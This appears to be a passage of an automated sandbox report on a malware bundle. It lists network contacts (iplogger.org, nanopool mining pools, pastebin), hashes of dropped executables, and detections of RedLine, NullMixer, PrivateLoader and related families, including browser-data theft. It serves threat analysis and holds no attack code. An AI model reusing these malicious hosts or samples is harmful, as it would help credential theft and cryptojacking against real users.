| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.19.117.22:80 | crl.microsoft.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 23.192.22.93:80 | www.microsoft.com | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| GB | 51.195.138.197:14433 | xmr-eu2.nanopool.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| NL | 51.15.58.224:14433 | xmr-eu1.nanopool.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 72.84.118.132:8080 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| NL | 45.9.20.156:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
Files
memory/2740-0-0x0000000074A8E000-0x0000000074A8F000-memory.dmp
memory/2740-1-0x0000000000E70000-0x000000000157C000-memory.dmp
\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe
| MD5 | a97c8c767343939c63ab2c3a7f9186fd |
| SHA1 | 5a8582d13af999922c1ad75db58950ad9523f8dc |
| SHA256 | c528db4c190ac29c57c7810b26e9bf5c6e78b2ebbdbe64d81cfe57289a537768 |
| SHA512 | 268bb93a76760e4f8a3d3229cdc5dec5930de46d1fdd85950015f68dab403f615d3e5854d04c72397c990cfd5525f233920c540adad50ef1e2696426ec37b599 |
\Users\Admin\AppData\Local\Temp\inst2.exe
| MD5 | d57afeb2944b37345cda2e47db2ca5e3 |
| SHA1 | d3c8c74ae71450a59f005501d537bdb2bdd456ee |
| SHA256 | 06fa55c63ca655c7d67ac59fc8276d086bc39dbe727ef7de80fc42dcd575711e |
| SHA512 | d9ece7d17c4e275f85a4bc58128ef67abc33b19cc77425e5fd2f896a03975469432fa9ec8f05eeefe3ac5062c1fb842702cc80a4eb97b1737597b6dc3dde94e8 |
C:\Users\Admin\AppData\Local\Temp\4.exe
| MD5 | 1581dee9ad745f69413381da2c06f68b |
| SHA1 | 79926e1bbcb97f41e63efcba2ab696259fdb98ce |
| SHA256 | f8cb7c4bf0b265fcbed502ab4abb3dfa6c0488c0d53c68742582df26bbd6bf0e |
| SHA512 | 9ea8f526304bf123e4f50cb94468d01287576edafcbc25046c9d5094d8990dee38a9309d00462239a8c73f6b3d288354dd6fcfab29ab4fe60db6acde500283ff |
C:\Users\Admin\AppData\Local\Temp\cxl-game.exe
| MD5 | 199ac38e98448f915974878daeac59d5 |
| SHA1 | ec36afe8b99d254b6983009930f70d51232be57e |
| SHA256 | b3f30bbad084a12ea28f3c21157083b1e0d30ca57e0da4e678d8567b5eb79dcf |
| SHA512 | 61af8746f073870dd632adb7cca4cec0f4772ea5737b25da1cce1f7104a5826019ea72ba84174b7758b73b2cd3fd8320c3acffd1bd5f96704d4061323413867e |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | a7703240793e447ec11f535e808d2096 |
| SHA1 | 913af985f540dab68be0cdf999f6d7cb52d5be96 |
| SHA256 | 6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f |
| SHA512 | 57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e |
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
| MD5 | 7b1ff60b0ba26d132c74535a641a0e02 |
| SHA1 | 0180b514cb32ae43fcefda0863a96f1f79a51b33 |
| SHA256 | accb11ccb1692a5e771981a5659d68c8adc3e225f476ca3387b57d818381ed1b |
| SHA512 | 3dbe1669e6f0f2c498a4276ef4d31ccf872bc2fcd4f1a1c282e6caf48d6cbd12d8685a05a9f43e3eef9fff8ba143ad1b14227f6c1a4a4263e242b5f8716a1034 |
memory/2844-40-0x0000000000910000-0x0000000000918000-memory.dmp
memory/2704-39-0x0000000000930000-0x000000000094A000-memory.dmp
memory/2552-44-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2704-49-0x0000000000240000-0x0000000000246000-memory.dmp
\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
| MD5 | dd3f5335f760b949760b02aac1187694 |
| SHA1 | f53535bb3093caef66890688e6c214bcb4c51ef9 |
| SHA256 | 90206625829c37a60ab736cfd7a8ff46f89524123b3246eabeaa77a2126bba26 |
| SHA512 | e715b69ca632f51c449a415ef831ed0d7e0160af20a3f79b09cb31bdce8920697c30c5f625851e9418bc087145b7b16deea7cc57c159c331350f1c88e7785004 |
\Users\Admin\AppData\Local\Temp\is-OOOHO.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2892-75-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1724-79-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2552-81-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2404-89-0x0000000000300000-0x0000000000308000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8.exe
| MD5 | 360e4cdd67c04428d4a9b9b59d352584 |
| SHA1 | de633409edc357f21da340992cbb035350001254 |
| SHA256 | 01a005463e33fb90c1b77e0fcee36f5e7856fe6868313df3c1fe123fe4c1e1a8 |
| SHA512 | e0c9056943d7e70f5e506696ce9b0236d083fe6cb08fb7511355fac380da3b56fad552789053d58de06b5e980fd38319b865be962b09e1d3f2f46a84ef177084 |
\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
| MD5 | f7f7ab4f0a4d1c8d127a1c6bb4c0ea6e |
| SHA1 | d7462d88f1fb9904fe3f1e937e2ebc0809607f8a |
| SHA256 | f564d99d0ce406b1ca653ad2d3c40d6d4c6d9304729fd47a22bb6157be6294a6 |
| SHA512 | 95e156b95132d6a7df5c15ba7f7d0b6d683a16e46c83716090a83a4cf1016f5a9e45ec45026f05287f55596bd669fac5b1873d89779795011ff7bd4484aab7e2 |
\Users\Admin\AppData\Local\Temp\nstF2F.tmp\System.dll
| MD5 | fbe295e5a1acfbd0a6271898f885fe6a |
| SHA1 | d6d205922e61635472efb13c2bb92c9ac6cb96da |
| SHA256 | a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1 |
| SHA512 | 2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06 |
\Users\Admin\AppData\Local\Temp\nstF2F.tmp\INetC.dll
| MD5 | 2b342079303895c50af8040a91f30f71 |
| SHA1 | b11335e1cb8356d9c337cb89fe81d669a69de17e |
| SHA256 | 2d5d89025911e2e273f90f393624be4819641dbee1606de792362e442e54612f |
| SHA512 | 550452dadc86ecd205f40668894116790a456fe46e9985d68093d36cf32abf00edecb5c56ff0287464a0e819db7b3cc53926037a116de6c651332a7cc8035d47 |
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
| MD5 | 89d1bd67214042bde02749afdc91b85f |
| SHA1 | bd3b9b45fecb02a8d38a3f2dab7de14a3e4f8ea4 |
| SHA256 | 4672ca322e9d03b30223452f9d9be6e78d957ef47fc046fc60a1fffc1edad1e0 |
| SHA512 | bacf183ae91cd2f8521f5ff376a2f004b2222738b5ffe2c69d623b33266186ccc7036fb255591af1d3b7f1003376950486e42cb1dc202a60ffd597a7227a15ad |
memory/1540-140-0x0000000001100000-0x0000000001108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Jonba.exe
| MD5 | 3434b3e59d0dc8d25ff3e83ced5d6f87 |
| SHA1 | 1cfc6af2e22fc55e8bcbce2cbe0ea572cff11d8f |
| SHA256 | f2201a75165335d71b3f303fb46db6b8e6e160cba924bc02b2409da5c8c83b40 |
| SHA512 | 6f7850598937f930a6732a1e713ebe47cc716fe9e32a68623378c8143c57da1f51f4af97f6886bce3f48b8a04b0bd540839eee23ca0926f6bf44c2f5af12980a |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\WcWfz1Tn.MJ
| MD5 | e1caa9cc3b8bd60f12093059981f3679 |
| SHA1 | f35d8b851dc0222ae8294b28bd7dee339cc0589b |
| SHA256 | 254b6e6f43b2707ac107664b163ba074051b0534aafa8faf85a1760299182565 |
| SHA512 | 23f3fa616c1a96acd9a781d833a69ac37a9989dc5605396ecde41beae971b287bc963ea8020c56d92034e7e284c37639280650e1674864707ba859ad5815cdfa |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\1w8lBDVH.aou
| MD5 | 112b8c9fa0419875f26ca7b592155f2b |
| SHA1 | 0b407062b6e843801282c2dc0c3749f697a67300 |
| SHA256 | 95ae984c19dbf91919296efb398aaf700605910a28abe9288c7639c7d9223202 |
| SHA512 | a71e187dbc18c2d7cd21b1e856ee7d58e230b801758ed6a2205e8dacdc8235a09111014cff3171ea82e8942251508ada57eefdbcbc13daddbfbe30eddc29dad8 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\MyBa.V
| MD5 | 51424c68f5ff16380b95f917c7b78703 |
| SHA1 | 70aa922f08680c02918c765daf8d0469e5cd9e50 |
| SHA256 | 065f5b48408abb0260d68775e6db36136c8ac2bd7c8a1168613cc5cb8825d315 |
| SHA512 | c7510a9555402d64665bcbce661eb54c1bcbb20095c084036d8af625de9d0bf93cb33e93cbc9b6efbc73f9080ef7052dcbc35fb8d44ccf56fb2db8af933e06af |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\9Bu~.w
| MD5 | 8b4e06aede42785b01c3cdf3f0883da6 |
| SHA1 | 664fdc12cb0141ffd68b289eaaf70ae4c5163a5a |
| SHA256 | 8a8d67872f0bc6e6669f7396a84b879d12882ea495467b09b6613edfc4108c42 |
| SHA512 | 7b6a20e41365c546f1aa5a84964b36fc4cedd194754d1f09cfdadf822f4141d037067811ca62a7d2da23ec1e332943cb828d4f771308fdfa79327cb3fb6f2c82 |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\hKS2IU.1Q
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
memory/1860-212-0x00000000028E0000-0x00000000038E0000-memory.dmp
memory/2772-213-0x0000000000400000-0x0000000002F74000-memory.dmp
memory/2892-214-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1880-215-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1860-217-0x00000000028E0000-0x00000000038E0000-memory.dmp
memory/2216-223-0x0000000000110000-0x0000000000330000-memory.dmp
memory/2216-224-0x000000001B360000-0x000000001B580000-memory.dmp
memory/1860-225-0x000000002D360000-0x000000002D406000-memory.dmp
memory/1860-229-0x000000002D410000-0x000000002D4A3000-memory.dmp
memory/1860-226-0x000000002D410000-0x000000002D4A3000-memory.dmp
memory/1860-239-0x000000002D410000-0x000000002D4A3000-memory.dmp
memory/1860-240-0x000000002D4B0000-0x000000002E316000-memory.dmp
memory/1860-241-0x000000002E320000-0x000000002E3AD000-memory.dmp
memory/1860-242-0x000000002E3B0000-0x000000002E438000-memory.dmp
memory/1860-243-0x000000002E3B0000-0x000000002E438000-memory.dmp
memory/1860-245-0x000000002E3B0000-0x000000002E438000-memory.dmp
memory/1860-246-0x0000000000090000-0x0000000000093000-memory.dmp
memory/1860-247-0x00000000000A0000-0x00000000000A5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 816520bddbb9cd95a5904ba5c6626989 |
| SHA1 | d6aca0489429c82eab0f5e213f1ca93648a36eb2 |
| SHA256 | 8877b12798309300f6f18ac44e2c4770076c152b5ba36f17b8bf94338adc178a |
| SHA512 | 2db4fb133d24d8cd8905c42e8affab1efd322efa740ba8381de4a0f610a2492a78dfc42761d85d7df13334938da7ddd0fe95a6066ff3d40f03c2f71f2f5660c3 |
memory/2656-262-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-260-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-270-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-276-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-274-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-272-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-268-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-266-0x0000000140000000-0x0000000140786000-memory.dmp
memory/2656-264-0x0000000140000000-0x0000000140786000-memory.dmp
memory/1620-307-0x0000000001C60000-0x0000000001C66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\f78be40.exe
| MD5 | a014b8961283f1e07d7f31ecdd7db62f |
| SHA1 | 70714b6dc8abbaa5d1cba38c047ea3a4ec6ac065 |
| SHA256 | 21ce0cdfaeb6d7f58bd17545be18f9cd3ac2476939112872d1a05d3164098f89 |
| SHA512 | bd0bb1405c7d74c941c5db0d3fd5fbe93544055f79db5076ab293c868568873df98f902c343096ff765be6c4911435617aab2ada15591dfc90606b5630d64869 |
memory/2220-321-0x0000000000A80000-0x0000000000A88000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
10s
Max time network
150s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3824 set thread context of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe |
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS82DABCB7\Sat0647140c100d63.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
